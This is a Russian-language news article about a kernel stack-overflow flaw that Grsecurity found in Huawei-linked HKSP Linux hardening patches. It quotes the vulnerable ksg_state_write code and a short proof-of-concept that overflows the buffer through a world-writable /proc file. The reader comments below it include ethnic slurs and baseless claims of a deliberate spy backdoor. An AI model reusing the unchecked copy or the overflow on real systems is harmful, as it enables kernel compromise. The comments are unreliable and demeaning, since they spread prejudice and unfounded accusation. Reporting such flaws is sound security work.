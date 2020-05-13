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Проблемы с безопасностью в патчах, предложенных сотрудником Huawei для защиты ядра Linux

13.05.2020 12:33

Разработчики проекта Grsecurity обратили внимание на наличие тривиально эксплуатируемой уязвимости в наборе патчей HKSP (Huawei Kernel Self Protection), несколько дней назад предложенных для повышения защиты ядра Linux. Ситуация напоминает случай с Samsung, в котором попытка повышения безопасности системы привела к появлению новой уязвимости и упростила компрометацию устройств.

Патчи HKSP были опубликованы сотрудником компании Huawei, включают упоминание Huawei в профиле GitHub и используют слово Huawei в расшифровке названия проекта (HKSP - Huawei Kernel Self Protection). При этом педставители Huawei опровергли связь проекта HKSP с компанией и заявили, что код разработан по личной инициативе работника, не является официальным проектом Huawei и не используется в продуктах данной компании. На GitHub-странице HKSP задним числом после обнаружения уязвимости также было добавлено примечание, что проект развивается в свободное время в исследовательских целях.

HKSP включает такие изменения, как рандомизация смещений в структуре cred, защита от атак на пространство имён идентификаторов пользователей (pid namespace), отделение стека процессов от области mmap, выявление двойного вызова функции kfree, блокирование утечек через псевдо-ФС /proc (/proc/{modules, keys, key-users}, /proc/sys/kernel/* и /proc/sys/vm/mmap_min_addr, /proc/kallsyms), улучшение рандомизации адресов в пространстве пользователя, дополнительная защита Ptrace, усиление защиты smap и smep, возможность запрета отправки данных через raw-сокеты, блокирование некорректных адресов в UDP-сокетах и проверка целостности запускаемых процессов. В состав также входит модуль ядра Ksguard, нацеленный на определение попыток внедрения типовых руткитов.

Патчи вызвали интерес у Грега Кроа-Хартмана (Greg Kroah-Hartman), отвечающего за поддержку стабильной ветки ядра Linux, который попросил автора разбить монолитный патч на части для упрощения рецензировния и продвижения в основной состав ядра. Кес Кук (Kees Cook), возглавляющий проект по продвижению в ядро Linux технологии активной защиты, также положительно отозвался о патчах и из проблем обратил внимание на привязку к архитектуре x86 и уведомительный характер многих режимов, которые лишь выводят в лог сведения о проблеме, но не пытаются её блокировать.

Изучение патча разработчиками Grsecurity выявило множество ошибок и слабых мест в коде, а также показало отсутствие модели угроз, позволяющей адекватно судить о возможностях проекта. Для наглядной демонстрации того, что код написан без применения методов безопасного программирования, приведён пример тривиальной уязвимости в обработчике файла /proc/ksguard/state, который создаётся с правами 0777, подразумевающими открытие доступа всем на запись. В функции ksg_state_write, используемой для разбора команд, записываемых в /proc/ksguard/state, создаётся буфер tmp[32], в который данные записываются на основании размера переданного операнда, без учёта размера целевого буфера и без проверки параметра с размером строки. Т.е. для перезаписи части стека ядра атакующему достаточно записать специально оформленную строку в /proc/ksguard/state. 


   static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                      size_t len, loff_t *offset)
   {
	u64 value;
	char tmp[32];
	size_t n = 0;

        if (copy_from_user(tmp, buf, len))
                return -1;

	value = simple_strtoul(tmp, '\0', 10);
        ...

Прототип эксплоита: 


       char buf[4096] = { };
        int fd = open("/proc/ksguard/state", O_WRONLY);
        if (fd >= 0) {
		write(fd, buf, sizeof(buf));
		close(fd);
	}


  1. Главная ссылка к новости (https://grsecurity.net/huawei_...)
  2. OpenNews: Уязвимость в модификациях ядра, сделанных Samsung для повышения безопасности Android
  3. OpenNews: Выпуск модуля LKRG 0.7 для защиты от эксплуатации уязвимостей в ядре Linux
  4. OpenNews: Необдуманное исправление привело к неполному устранению уязвимости Spectre в ядре Linux
  5. OpenNews: Huawei развивает протокол NEW IP, нацеленный на использование в сетях будущего
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/52942-huawei
Ключевые слова: huawei, grsecurity, kernel, securty
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (30) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 13:05, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +10 +/
    Huawei - всегда были хитрыми крысами.
     
     
  • 2.10, кеша (?), 13:34, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    бесят китаезы..еще и лезут в ИТ со своим говнокодом..
     
     
  • 3.13, А.Н.Оним (?), 13:53, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Дядь, говнокод не имеет национальности. Хреново писать код дело не хитрое
     
     
  • 4.15, Аноним (15), 14:03, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Поверь, у них там 1 из 10 код нормально писать умеет
     
  • 4.24, Аноним (24), 14:31, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Национальности он, может, и не имеет, а культуру (которая с национальностью коррелирует сильно) - вполне. У китайцев тысячелетняя традиция делать все ровно настолько хорошо, чтобы не настучали бамбуковыми палками по пяткам, и ни на миллиметр лучше.
     
  • 2.30, Аноним (-), 15:06, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +6 +/
    Хитpoжoпые китaйцы! Сначала весь мир зapaзили, теперь мой Linux зapaжают.
     

  • 1.2, Повидло19 (?), 13:07, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Всем повидла!
     
  • 1.3, proninyaroslav (ok), 13:08, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Ну а что, американские чёрных ходы есть, почему бы не добавить китайские, для конкуренции. Смешно выглядит только то, как они открестились от патчей
     
     
  • 2.7, alex (??), 13:29, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    просто надо "тоньше" добавлять
     
     
  • 3.25, СеменСеменыч777 (?), 14:37, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    в следующий раз они будут умнее.
     
  • 3.29, Аноним (29), 15:02, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Они не умеют:
    https://tjournal.ru/news/104669-smi-kitayskie-vlasti-nachali-ustanavlivat-shpi
     

  • 1.4, Аноним (4), 13:09, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +5 +/
    > педставители Huawei опровергли связь проекта HKSP с компанией и заявили, что код разработан по личной инициативе работника

    И вообще, этот сотрудник уволился еще две недели назад.

     
     
  • 2.8, КО (?), 13:31, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    И торговую марку он использовал чисто случайно
     

  • 1.9, Аноним (9), 13:33, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Grsecurity разве не оштрафовали на сотни килобаксов за необоснованные наезды?
     
     
  • 2.12, pin (??), 13:50, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Да пофиг на суд и штрафы. Он профи свого дела, главное, что бы продолжали свою деятельность.
     

  • 1.11, Аноним (11), 13:45, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > наличие тривиально эксплуатируемой уязвимости в наборе патчей HKSP (Huawei Kernel Self Protection), несколько дней назад предложенных для повышения защиты ядра Linux. Ситуация напоминает случай с Samsung, в котором попытка повышения безопасности системы привела к появлению новой уязвимости и упростила компрометацию устройств.

    Это все не баги, а фичи.

    > педставители Huawei опровергли связь проекта HKSP с компанией и заявили, что код разработан по личной инициативе работника, не является официальным проектом Huawei и не используется в продуктах данной компании

    Не используется но хотели...

     
  • 1.14, Аноним (14), 13:53, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не прокатило
     
  • 1.16, Аноним (-), 14:09, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Следующая новость: Грег Кроа-Хартман умер от коронавируса.
     
  • 1.17, тоже Аноним (ok), 14:12, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    - А что это у вас в счете такое написано: "Итого: 2000. Получилось: 2400"?
    - Ну, значит, не получилось...
     
  • 1.18, Аноним (18), 14:13, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    посоны суды проиграли и теперь с издевкой как бы себе набивают, "тогда поймешь, кого ты потеряла"
     
  • 1.20, robot228 (?), 14:14, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Китая самая опасная и хитрая нация на земле. Вы не представляете что они делают у себя на родине (а я знаю частично как они ведут себя, особенно с иностраницами т.к. мы были их клиентами как и они нашими)). Неудивительно ,что шпион проникшей в линукс нарочно оставил дыру в безопасности.
     
  • 1.21, Аноним (-), 14:18, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Слишком топорный бэкдур, надо было изловчиться и что-нибудь пооригинальнее придумать. Учитесь, китайские программисты, у Оракла и Рэдхата.
     
     
  • 2.31, КО (?), 15:07, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Да ладно тебе - его легко исправят и вуаля - проект прошел рецензирование у самих посонов из GR, замечания исправлены. Второй то раз и пристально никто глядеть и не будет. ;)
     

  • 1.22, Аноним (22), 14:22, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Ни одного нормального комментария по теме. Люди, что же с нами стало? 🤣
     
     
  • 2.27, Аноним (27), 14:56, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Хочешь комментарии по теме? Пиши сам или заплати людям, которые напишут за тебя!
     
  • 2.28, Аноним (29), 15:00, 13/05/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    А что их комментировать ? И так всё ясно с ними:
    https://www.kommersant.ru/doc/3968531
     

  • 1.23, Аноним (23), 14:30, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Патчи можно будет доработать...
     
  • 1.26, Fracta1L (ok), 14:38, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Хотели добавить в ядро очередных сишных дыр, понятно
     
  • 1.32, Капитан Очевидность (?), 15:08, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Прототип эксплоита в новости, никому неинтересен (или непонятен) - это же очевидно!
     
  • 1.33, анонимс (?), 15:13, 13/05/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    ох уж эти китайские зонды
     

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